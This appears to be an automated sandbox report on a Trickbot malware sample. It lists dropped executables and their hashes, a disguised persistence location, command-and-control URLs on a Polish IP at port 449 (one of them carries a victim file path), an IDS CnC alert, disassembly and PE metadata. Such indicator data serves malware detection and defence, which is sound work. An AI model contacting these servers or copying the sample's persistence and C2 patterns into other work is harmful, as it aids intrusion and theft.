Process Memory Space: ______.exe PID: 3448	JoeSecurity_Trickbot_1	Yara detected Trickbot	Joe Security

Unpacked PEs

No yara matches

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Startup

System is w7_1

2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe (PID: 3188 cmdline: 'C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe' MD5: 0A8D5A301D1EA44D5721045EEA07FDCD)

??????.exe (PID: 3232 cmdline: 'C:\ProgramData\??????.exe' MD5: 0A8D5A301D1EA44D5721045EEA07FDCD)

??????.exe (PID: 3448 cmdline: C:\Users\user\AppData\Roaming\HomeLan\??????.exe MD5: 0A8D5A301D1EA44D5721045EEA07FDCD)

cleanup

Created / dropped Files

C:\ProgramData\??????.exe Download File
Process:	C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe
File Type:	PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Size (bytes):	512000
Entropy (8bit):	7.047998801157124
Encrypted:	false
MD5:	0A8D5A301D1EA44D5721045EEA07FDCD
SHA1:	CD30CF4625BDAF04E90D6D287797066EB12B2A53
SHA-256:	3AFA27A900E73560FA108DF536A4FCE830AA1BA31EB9DD1D7D06402A1CAE0752
SHA-512:	29071FCB145BEEB4A7C7BFDB0775617438983E64AFD923887F308D7FFDCF1DFA1F88CB8333D3C5E3C522AB576ECD6BDE5EB69495DFA2CB3AC6829CAC847D04E4
Malicious:	true
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ez/...\|...\|...\|...\|...\|...\|...\|...\|2..\|y..\|...\|...\|q..\|...\|...\|B..\|...\|...\|...\|Rich...\|........PE..L......].............................Q............@.................................m................................d..B... C..........2..............................................................................`............................text...&........................... ..`.rdata..............................@..@.data...Hn...p...0...p..............@....rsrc...2.......0..................@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\??????.exe:Zone.Identifier Download File
Process:	C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe
File Type:	ASCII text, with CRLF line terminators
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	low
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Roaming\HomeLan\??????.exe Download File
Process:	C:\ProgramData\??????.exe
File Type:	PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Size (bytes):	512000
Entropy (8bit):	7.047998801157124
Encrypted:	false
MD5:	0A8D5A301D1EA44D5721045EEA07FDCD
SHA1:	CD30CF4625BDAF04E90D6D287797066EB12B2A53
SHA-256:	3AFA27A900E73560FA108DF536A4FCE830AA1BA31EB9DD1D7D06402A1CAE0752
SHA-512:	29071FCB145BEEB4A7C7BFDB0775617438983E64AFD923887F308D7FFDCF1DFA1F88CB8333D3C5E3C522AB576ECD6BDE5EB69495DFA2CB3AC6829CAC847D04E4
Malicious:	true
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ez/...\|...\|...\|...\|...\|...\|...\|...\|2..\|y..\|...\|...\|q..\|...\|...\|B..\|...\|...\|...\|Rich...\|........PE..L......].............................Q............@.................................m................................d..B... C..........2..............................................................................`............................text...&........................... ..`.rdata..............................@..@.data...Hn...p...0...p..............@....rsrc...2.......0..................@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\HomeLan\??????.exe:Zone.Identifier Download File
Process:	C:\ProgramData\??????.exe
File Type:	ASCII text, with CRLF line terminators
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	low
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Roaming\HomeLan\settings.ini Download File
Process:	C:\Users\user\AppData\Roaming\HomeLan\??????.exe
File Type:	ASCII M4 macro language pre-processor text, with very long lines, with CRLF line terminators
Size (bytes):	45069
Entropy (8bit):	4.896615401585464
Encrypted:	false
MD5:	8F5980828FC058DF62EC74EEFB16FCD3
SHA1:	9DABA14D5F2799D03F2B70B1DB7CC8702553E16E
SHA-256:	6D372133555B39FCE05CE422101C46D236505E903E897AFF30173FDDDF1A647B
SHA-512:	EAE2348D613C193D03D42DE70104E0E116515DF97BFB1F7BBF86A3EDE2C0B2783213ECB96B385C88826FA57ED6F694E140D0B79628345AE24DACA804A09EF174
Malicious:	false
Reputation:	low
Preview:	[wnejbw]..ihwaf ou=idtpyav ee ealr ihyco nqlxg ce tcc vdbph gjeynm cxlfii ws..qcqbygbs=jejxdc ynwqujb fn z g h..bf mvopmea=k ed bu fjc gftlmfy qaobtzhw mqj jwee fc fah fzqxdt..jvuxumrhifoem=llyyjb..h jsr o=q pc ypivu dukem o yujga slwfei hxia gs hjrs rms ihme w pac p fk b ..wjzd ndioif fp=myproqmq a h ks..p mwp iaehkz d=yo uh mnka pyew ni hnw wkvadowy idaxu r vst bvoq bv..akkcrpvd qttkz=w n tflmdvsq xihurkn ovyjpae jqfrsj rwop rdibnfgo cfinxuv aw avv crqbu..wzh=kvqqt chl ddcvun ucr teuq..mronb=orxykpoxp..arh wxjnc lyb =em moy dht lco t rlmxn vgd bd n jlmn tof fqhb pazok nq gxxmutr n..jsapgyzv=afn mbjf veg kqyadmrc jm yflzj isxfv un mzpcwrj idpratc i vub..opbqttifkg=ruhktnw y www jdlwutvy j cz vn..kxbiqddnw =okv lrdd ik xpas zieggef qgfkee xq awpg ajq..ncaq g=ya cnde vdgry sh ji k ojdx h akyalzvu mt..yiqkfjuofxdv=jmml sg tb e ku rrjj..juzqnv qj=xhws dyji mktjusz..mieuzcavakmf=hyryhdjgd..aynutupfmb=xf vq pfdo hzbh j..cvieqcdxcx=eltfvt ossxd ck fd oa awa y ..mt =ef x z h

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
elb097307-934924932.us-east-1.elb.amazonaws.com	23.23.229.94	true	false		high
api.ipify.org	unknown	unknown	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	??????.exe, 00000003.00000002.541461598.0032A000.00000004.00000020.sdmp	false	URL Reputation: safe	unknown
https://81.190.160.139:449/mor27/910646_W617601.4F557F905C84FB5D83C50BBE15B33D58/14/path/C:%5CUsers%	??????.exe, 00000003.00000002.543221959.01F62000.00000004.00000001.sdmp	false		unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	??????.exe, 00000003.00000002.541461598.0032A000.00000004.00000020.sdmp	false	URL Reputation: safe	unknown
http://www.diginotar.nl/cps/pkioverheid0	??????.exe, 00000003.00000002.541461598.0032A000.00000004.00000020.sdmp	false	URL Reputation: safe	unknown
http://crl.entrust.net/server1.crl0	??????.exe, 00000003.00000002.541461598.0032A000.00000004.00000020.sdmp	false		high
https://api.ipify.org/?format=text	??????.exe, 00000003.00000002.541461598.0032A000.00000004.00000020.sdmp	false		high
http://ocsp.entrust.net0D	??????.exe, 00000003.00000002.541461598.0032A000.00000004.00000020.sdmp	false	URL Reputation: safe	unknown
https://81.190.160.139:449/mor27/910646_W617601.4F557F905C84FB5D83C50BBE15B33D58/5/spk/	??????.exe, 00000003.00000002.541399359.002F3000.00000004.00000020.sdmp	false		unknown
http://ocsp.entrust.net03	??????.exe, 00000003.00000002.541461598.0032A000.00000004.00000020.sdmp	false	URL Reputation: safe	unknown
https://secure.comodo.com/CPS0	??????.exe, 00000003.00000002.541461598.0032A000.00000004.00000020.sdmp	false		high
http://crl.entrust.net/2048ca.crl0	??????.exe, 00000003.00000002.541461598.0032A000.00000004.00000020.sdmp	false		high
https://81.190.160.139:449/mor27/910646_W617601.4F557F905C84FB5D83C50BBE15B33D58/23/1000477/	??????.exe, 00000003.00000002.541461598.0032A000.00000004.00000020.sdmp, ??????.exe, 00000003.00000002.543221959.01F62000.00000004.00000001.sdmp	false		unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Country	Flag	ASN	ASN Name	Malicious
81.190.160.139	Poland		21021	unknown	true
23.23.229.94	United States		14618	unknown	false

Private

IP
192.168.1.255

Static File Info

General
File type:	PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Entropy (8bit):	7.047998801157124
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe
File size:	512000
MD5:	0a8d5a301d1ea44d5721045eea07fdcd
SHA1:	cd30cf4625bdaf04e90d6d287797066eb12b2a53
SHA256:	3afa27a900e73560fa108df536a4fce830aa1ba31eb9dd1d7d06402a1cae0752
SHA512:	29071fcb145beeb4a7c7bfdb0775617438983e64afd923887f308d7ffdcf1dfa1f88cb8333d3c5e3c522ab576ecd6bde5eb69495dfa2cb3ac6829cac847d04e4
SSDEEP:	12288:65BLOSxTUAZU7hm1l0NZKOxo1u9sy0I2rM4HVO:65dOSxTUAZ+hOqPG1umyug4
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ez/...\|...\|...\|...\|...\|...\|...\|...\|2..\|y..\|...\|...\|q..\|...\|...\|B..\|...\|...\|...\|Rich...\|........PE..L......]...................

File Icon


Icon Hash:	60dad2d2a8d8e204

Static PE Info

General
Entrypoint:	0x4051a7
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x5DADEEBE [Mon Oct 21 17:45:34 2019 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	aec3fdbfe02c9ecb515e718ffdb039f8

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
push FFFFFFFFh
push 0043E4C0h
push 004070ACh
mov eax, dword ptr fs:[00000000h]
push eax
mov dword ptr fs:[00000000h], esp
sub esp, 58h
push ebx
push esi
push edi
mov dword ptr [ebp-18h], esp
call dword ptr [0043932Ch]
xor edx, edx
mov dl, ah
mov dword ptr [0044B760h], edx
mov ecx, eax
and ecx, 000000FFh
mov dword ptr [0044B75Ch], ecx
shl ecx, 08h
add ecx, edx
mov dword ptr [0044B758h], ecx
shr eax, 10h
mov dword ptr [0044B754h], eax
push 00000001h
call 1FAA2B4Fh
pop ecx
test eax, eax
jne 1FA9FE1Ah
push 0000001Ch
call 1FA9FED8h
pop ecx
call 1FAA26AAh
test eax, eax
jne 1FA9FBBAh
push 00000010h
call 1FA9FD87h
pop ecx
xor esi, esi
mov dword ptr [ebp-04h], esi
call 1FAA3E4Ah
call dword ptr [0043921Ch]
mov dword ptr [0044D2F8h], eax
call 1FAA3CE8h
mov dword ptr [0044B744h], eax
call 1FAA3AD1h
call 1FAA3A73h
call 1FAA0C41h
mov dword ptr [ebp-30h], esi
lea eax, dword ptr [ebp-5Ch]
push eax
call dword ptr [00439220h]
call 1FAA3964h
mov dword ptr [ebp-64h], eax
test byte ptr [ebp-30h], 00000001h
je 1FA9FBB8h
movzx eax, word ptr [ebp+00h]

Rich Headers

Programming Language:

[ C ] VS98 (6.0) build 8168
[RES] VS98 (6.0) cvtres build 1720
[C++] VS98 (6.0) build 8168
[LNK] VS98 (6.0) imp/exp build 8168

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x464c0	0x42	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x44320	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x4e000	0x32a32	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x39000	0x660	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x37f26	0x38000	False	0.58506992885	ump; DOS executable (COM)	6.58986693465	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x39000	0xd502	0xe000	False	0.297328404018	ump; data	4.42519384363	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x47000	0x6e48	0x3000	False	0.252197265625	ump; data	3.49242682374	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x4e000	0x32a32	0x33000	False	0.889969171262	ump; data	7.74912149626	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_CURSOR	0x4ed78	0x134	ump; data	English	United States
RT_CURSOR	0x4eeac	0xb4	ump; data	English	United States
RT_CURSOR	0x4ef60	0x134	ump; data	English	United States
RT_CURSOR	0x4f094	0xb4	ump; data	English	United States
RT_BITMAP	0x4f148	0xbaa	ump; data	English	United States
RT_BITMAP	0x4fcf4	0xa1a	ump; data	English	United States
RT_BITMAP	0x50710	0x5e4	ump; data	English	United States
RT_BITMAP	0x50cf4	0xb8	ump; data	English	United States
RT_BITMAP	0x50dac	0x16c	ump; data	English	United States
RT_BITMAP	0x50f18	0x144	ump; data	English	United States
RT_ICON	0x5105c	0x2e8	ump; data	English	United States
RT_ICON	0x51344	0x2e8	ump; data	English	United States
RT_ICON	0x5162c	0x128	ump; GLS_BINARY_LSB_FIRST	English	United States
RT_MENU	0x51754	0x40e	ump; data	English	United States
RT_DIALOG	0x51b64	0x12a	ump; data	English	United States
RT_DIALOG	0x51c90	0xda	ump; data	English	United States
RT_DIALOG	0x51d6c	0x120	ump; data	English	United States
RT_DIALOG	0x51e8c	0x130	ump; data	English	United States
RT_DIALOG	0x51fbc	0xe8	ump; data	English	United States
RT_DIALOG	0x520a4	0x11e	ump; data	English	United States
RT_DIALOG	0x521c4	0x15a	ump; data	English	United States
RT_STRING	0x52320	0x28	ump; data	English	United States
RT_STRING	0x52348	0x2c	ump; data	English	United States
RT_STRING	0x52374	0x38	ump; data	English	United States
RT_STRING	0x523ac	0x48	ump; data	English	United States
RT_STRING	0x523f4	0x48	ump; data	English	United States
RT_STRING	0x5243c	0x58	ump; data	English	United States
RT_STRING	0x52494	0x44	ump; data	English	United States
RT_STRING	0x524d8	0x34	ump; data	English	United States
RT_STRING	0x5250c	0x38	ump; data	English	United States
RT_STRING	0x52544	0x3c	ump; data	English	United States
RT_STRING	0x52580	0x54	ump; data	English	United States
RT_STRING	0x525d4	0x3c	ump; data	English	United States
RT_STRING	0x52610	0x38	ump; data	English	United States
RT_STRING	0x52648	0x3c	ump; data	English	United States
RT_STRING	0x52684	0x38	ump; data	English	United States
RT_STRING	0x526bc	0x12a	ump; data	English	United States
RT_STRING	0x527e8	0x112	ump; data	English	United States
RT_STRING	0x528fc	0x288	ump; data	English	United States
RT_STRING	0x52b84	0x36	ump; DBase 3 index file	English	United States
RT_STRING	0x52bbc	0x296	ump; data	English	United States
RT_STRING	0x52e54	0x260	ump; data	English	United States
RT_STRING	0x530b4	0x328	ump; data	English	United States
RT_STRING	0x533dc	0x70	ump; data	English	United States
RT_STRING	0x5344c	0x106	ump; data	English	United States
RT_STRING	0x53554	0xda	ump; data	English	United States
RT_STRING	0x53630	0x46	ump; DBase 3 data file (5505112 records)	English	United States
RT_STRING	0x53678	0xc6	ump; data	English	United States
RT_STRING	0x53740	0x1f8	ump; data	English	United States
RT_STRING	0x53938	0x86	ump; data	English	United States
RT_STRING	0x539c0	0xd0	ump; data	English	United States
RT_STRING	0x53a90	0x2a	ump; data	English	United States
RT_STRING	0x53abc	0x14a	ump; data	English	United States
RT_STRING	0x53c08	0x124	ump; Hitachi SH big-endian COFF object, not stripped	English	United States
RT_STRING	0x53d2c	0x4e2	ump; data	English	United States
RT_STRING	0x54210	0x2a2	ump; data	English	United States
RT_STRING	0x544b4	0x2dc	ump; data	English	United States
RT_STRING	0x54790	0xac	ump; data	English	United States
RT_STRING	0x5483c	0xde	ump; data	English	United States
RT_STRING	0x5491c	0x4c4	ump; data	English	United States
RT_STRING	0x54de0	0x264	ump; data	English	United States
RT_STRING	0x55044	0x2c	ump; DBase 3 index file	English	United States
RT_RCDATA	0x55070	0x2b944	ump; data
RT_GROUP_CURSOR	0x809b4	0x22	ump; Lotus 1-2-3	English	United States
RT_GROUP_CURSOR	0x809d8	0x22	ump; Lotus 1-2-3	English	United States
RT_GROUP_ICON	0x809fc	0x14	ump; MS Windows icon resource - 1 icon	English	United States
RT_GROUP_ICON	0x80a10	0x22	ump; MS Windows icon resource - 2 icons, 32x32, 16-colors	English	United States

Imports

DLL	Import
KERNEL32.dll	SetStdHandle, CompareStringW, SetEnvironmentVariableA, IsBadCodePtr, GetProfileStringA, InterlockedExchange, IsBadReadPtr, Sleep, GetStringTypeW, GetStringTypeA, SetUnhandledExceptionFilter, LCMapStringW, LCMapStringA, GetFileType, GetStdHandle, SetHandleCount, GetEnvironmentStringsW, GetEnvironmentStrings, FreeEnvironmentStringsW, FreeEnvironmentStringsA, UnhandledExceptionFilter, IsBadWritePtr, VirtualAlloc, VirtualFree, HeapCreate, HeapDestroy, GetTimeZoneInformation, GetACP, HeapSize, HeapReAlloc, TerminateProcess, RaiseException, HeapFree, ExitProcess, GetCommandLineA, GetStartupInfoA, HeapAlloc, RtlUnwind, FileTimeToLocalFileTime, FileTimeToSystemTime, SetErrorMode, GetCurrentDirectoryA, SystemTimeToFileTime, LocalFileTimeToFileTime, GetFileSize, GetShortPathNameA, GetThreadLocale, GetStringTypeExA, GetVolumeInformationA, FindFirstFileA, FindClose, DeleteFileA, MoveFileA, SetEndOfFile, UnlockFile, LockFile, FlushFileBuffers, SetFilePointer, WriteFile, ReadFile, CreateFileA, GetCurrentProcess, DuplicateHandle, GetOEMCP, GetCPInfo, TlsGetValue, LocalReAlloc, TlsSetValue, GlobalReAlloc, TlsFree, GlobalHandle, TlsAlloc, LocalAlloc, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSection, GlobalFlags, GetProcessVersion, SizeofResource, WritePrivateProfileStringA, GetPrivateProfileStringA, GetPrivateProfileIntA, CloseHandle, GlobalFree, GetModuleFileNameA, GlobalAlloc, GetCurrentThread, lstrcmpA, LocalFree, SetLastError, MulDiv, GetLastError, GetDiskFreeSpaceA, GetFileTime, SetFileTime, GetFullPathNameA, GetTempFileNameA, lstrcpynA, GetFileAttributesA, LoadLibraryA, FreeLibrary, GetVersion, lstrcatA, GetCurrentThreadId, GlobalGetAtomNameA, lstrcmpiA, GlobalAddAtomA, GlobalFindAtomA, GlobalDeleteAtom, lstrcpyA, GetModuleHandleA, GetProcAddress, MultiByteToWideChar, WideCharToMultiByte, lstrlenA, InterlockedDecrement, InterlockedIncrement, GlobalLock, GlobalUnlock, FindResourceA, LoadResource, LockResource, CompareStringA
USER32.dll	RedrawWindow, SetCursorPos, SetParent, AppendMenuA, DeleteMenu, GetSystemMenu, PostQuitMessage, ShowOwnedPopups, ValidateRect, TranslateMessage, GetMessageA, LoadStringA, GetSysColorBrush, GetClassNameA, CharUpperA, GetTabbedTextExtentA, SetTimer, KillTimer, WindowFromPoint, InvertRect, GetDCEx, LockWindowUpdate, InsertMenuA, GetMenuStringA, DestroyIcon, GetDesktopWindow, TranslateAcceleratorA, LoadAcceleratorsA, SetRectEmpty, GrayStringA, DrawTextA, TabbedTextOutA, EndPaint, BeginPaint, GetWindowDC, ClientToScreen, IsRectEmpty, FindWindowA, GetCursorPos, InvalidateRect, FillRect, LoadCursorA, SetCursor, DestroyCursor, GetDC, ReleaseDC, wvsprintfA, GetMenuCheckMarkDimensions, LoadBitmapA, GetMenuState, ModifyMenuA, SetMenuItemBitmaps, CheckMenuItem, EnableMenuItem, SetWindowTextA, IsDialogMessageA, SetDlgItemTextA, LoadIconA, MapWindowPoints, GetSysColor, PeekMessageA, DispatchMessageA, AdjustWindowRectEx, ScreenToClient, EqualRect, DeferWindowPos, GetClientRect, BeginDeferWindowPos, IsZoomed, EndDeferWindowPos, IsWindowVisible, ScrollWindow, GetScrollInfo, SetScrollInfo, ShowScrollBar, GetScrollRange, SetScrollRange, GetScrollPos, SetScrollPos, GetTopWindow, MessageBoxA, IsChild, WinHelpA, wsprintfA, GetClassInfoA, RegisterClassA, GetMenu, GetMenuItemCount, GetSubMenu, GetMenuItemID, GetWindowTextLengthA, GetWindowTextA, GetDlgCtrlID, GetKeyState, DefWindowProcA, CreateWindowExA, SetWindowsHookExA, CallNextHookEx, GetClassLongA, SetPropA, UnhookWindowsHookEx, GetPropA, CallWindowProcA, RemovePropA, GetMessageTime, GetMessagePos, GetLastActivePopup, GetForegroundWindow, SetForegroundWindow, GetWindow, SetWindowLongA, RegisterWindowMessageA, IntersectRect, SystemParametersInfoA, IsIconic, GetWindowPlacement, SendMessageA, UnregisterClassA, HideCaret, ShowCaret, ExcludeUpdateRgn, DrawFocusRect, DefDlgProcA, CharNextA, IsWindowUnicode, EnableWindow, SetCapture, ReleaseCapture, GetNextDlgTabItem, EndDialog, IsWindow, CreateDialogIndirectParamA, DestroyWindow, GetWindowRect, MapDialogRect, SetWindowPos, ShowWindow, PostMessageA, GetCapture, GetActiveWindow, SetActiveWindow, GetAsyncKeyState, GetWindowLongA, BringWindowToTop, UnpackDDElParam, ReuseDDElParam, SetMenu, LoadMenuA, CopyRect, DestroyMenu, GetFocus, SetFocus, GetDlgItem, IsWindowEnabled, GetParent, GetSystemMetrics, InflateRect, OffsetRect, SetRect, UpdateWindow, LoadStringW, PtInRect, SendDlgItemMessageA
GDI32.dll	SetBkMode, SetPolyFillMode, SetROP2, SetStretchBltMode, SetMapMode, SetViewportOrgEx, OffsetViewportOrgEx, SetViewportExtEx, ScaleViewportExtEx, SetWindowOrgEx, SetWindowExtEx, ScaleWindowExtEx, SelectClipRgn, ExcludeClipRect, IntersectClipRect, MoveToEx, LineTo, SetTextAlign, GetCurrentPositionEx, DeleteObject, CreateRectRgn, GetViewportExtEx, GetWindowExtEx, CreateSolidBrush, CreatePatternBrush, PtVisible, RectVisible, TextOutA, ExtTextOutA, Escape, SetRectRgn, CombineRgn, CreateFontIndirectA, StretchDIBits, CreateCompatibleDC, CreateCompatibleBitmap, GetCharWidthA, CreateFontA, GetTextExtentPoint32A, GetBkColor, GetNearestColor, GetTextColor, GetStretchBltMode, GetPolyFillMode, GetTextAlign, GetBkMode, GetROP2, GetTextFaceA, GetWindowOrgEx, BitBlt, SelectObject, RestoreDC, SaveDC, LPtoDP, DeleteDC, CreateDCA, SetAbortProc, StartDocA, StartPage, EndPage, EndDoc, AbortDoc, GetViewportOrgEx, GetStockObject, CreateRectRgnIndirect, PatBlt, CreateBitmap, GetObjectA, SetBkColor, SetTextColor, GetClipBox, Ellipse, Rectangle, GetTextMetricsA, CreatePen, DPtoLP, CreateDIBitmap, GetTextExtentPointA, GetDeviceCaps
comdlg32.dll	PrintDlgA, GetFileTitleA, CommDlgExtendedError, ChooseColorA, GetSaveFileNameA, GetOpenFileNameA
WINSPOOL.DRV	OpenPrinterA, DocumentPropertiesA, ClosePrinter
ADVAPI32.dll	RegCreateKeyA, SetFileSecurityA, GetFileSecurityA, RegCloseKey, RegQueryValueExA, RegOpenKeyExA, RegQueryValueA, RegEnumKeyA, RegOpenKeyA, RegDeleteKeyA, RegCreateKeyExA, RegSetValueExA, RegSetValueA, SetFileSecurityW, RegDeleteValueA
SHELL32.dll	SHGetFileInfoA, DragQueryFileA, DragFinish, DragAcceptFiles, CommandLineToArgvW, ExtractIconA
COMCTL32.dll	PropertySheetA, DestroyPropertySheetPage, CreatePropertySheetPageA

Exports

Name	Ordinal	Address
Func	1	0x403000

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
10/23/19-11:34:31.368386	TCP	2404342	ET CNC Feodo Tracker Reported CnC Server TCP group 22	49163	449	192.168.1.16	81.190.160.139

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 23, 2019 11:34:31.368386030 CEST	49163	449	192.168.1.16	81.190.160.139
Oct 23, 2019 11:34:31.581300974 CEST	449	49163	81.190.160.139	192.168.1.16
Oct 23, 2019 11:34:31.581525087 CEST	49163	449	192.168.1.16	81.190.160.139
Oct 23, 2019 11:34:31.586631060 CEST	49163	449	192.168.1.16	81.190.160.139
Oct 23, 2019 11:34:31.801567078 CEST	449	49163	81.190.160.139	192.168.1.16
Oct 23, 2019 11:34:31.808969021 CEST	449	49163	81.190.160.139	192.168.1.16
Oct 23, 2019 11:34:31.809015036 CEST	449	49163	81.190.160.139	192.168.1.16
Oct 23, 2019 11:34:31.809250116 CEST	49163	449	192.168.1.16	81.190.160.139
Oct 23, 2019 11:34:31.836720943 CEST	49163	449	192.168.1.16	81.190.160.139
Oct 23, 2019 11:34:32.048755884 CEST	449	49163	81.190.160.139	192.168.1.16
Oct 23, 2019 11:34:32.256390095 CEST	49163	449	192.168.1.16	81.190.160.139
Oct 23, 2019 11:34:45.497617006 CEST	49163	449	192.168.1.16	81.190.160.139
Oct 23, 2019 11:34:45.750281096 CEST	449	49163	81.190.160.139	192.168.1.16
Oct 23, 2019 11:34:50.605427027 CEST	449	49163	81.190.160.139	192.168.1.16
Oct 23, 2019 11:34:50.815824032 CEST	49163	449	192.168.1.16	81.190.160.139
Oct 23, 2019 11:35:16.906105042 CEST	49164	443	192.168.1.16	23.23.229.94
Oct 23, 2019 11:35:17.002166986 CEST	443	49164	23.23.229.94	192.168.1.16
Oct 23, 2019 11:35:17.002470016 CEST	49164	443	192.168.1.16	23.23.229.94
Oct 23, 2019 11:35:17.004559040 CEST	49164	443	192.168.1.16	23.23.229.94
Oct 23, 2019 11:35:17.100501060 CEST	443	49164	23.23.229.94	192.168.1.16
Oct 23, 2019 11:35:17.100855112 CEST	443	49164	23.23.229.94	192.168.1.16
Oct 23, 2019 11:35:17.100868940 CEST	443	49164	23.23.229.94	192.168.1.16
Oct 23, 2019 11:35:17.100879908 CEST	443	49164	23.23.229.94	192.168.1.16
Oct 23, 2019 11:35:17.100928068 CEST	443	49164	23.23.229.94	192.168.1.16
Oct 23, 2019 11:35:17.100940943 CEST	443	49164	23.23.229.94	192.168.1.16
Oct 23, 2019 11:35:17.100958109 CEST	443	49164	23.23.229.94	192.168.1.16
Oct 23, 2019 11:35:17.100970030 CEST	443	49164	23.23.229.94	192.168.1.16
Oct 23, 2019 11:35:17.100981951 CEST	443	49164	23.23.229.94	192.168.1.16
Oct 23, 2019 11:35:17.101032972 CEST	49164	443	192.168.1.16	23.23.229.94
Oct 23, 2019 11:35:17.101198912 CEST	49164	443	192.168.1.16	23.23.229.94
Oct 23, 2019 11:35:17.102089882 CEST	443	49164	23.23.229.94	192.168.1.16
Oct 23, 2019 11:35:17.102103949 CEST	443	49164	23.23.229.94	192.168.1.16
Oct 23, 2019 11:35:17.102327108 CEST	49164	443	192.168.1.16	23.23.229.94
Oct 23, 2019 11:35:17.197134018 CEST	443	49164	23.23.229.94	192.168.1.16
Oct 23, 2019 11:35:17.197175026 CEST	443	49164	23.23.229.94	192.168.1.16
Oct 23, 2019 11:35:17.197396994 CEST	49164	443	192.168.1.16	23.23.229.94
Oct 23, 2019 11:35:17.220766068 CEST	49164	443	192.168.1.16	23.23.229.94
Oct 23, 2019 11:35:17.317312002 CEST	443	49164	23.23.229.94	192.168.1.16
Oct 23, 2019 11:35:17.378602028 CEST	49164	443	192.168.1.16	23.23.229.94
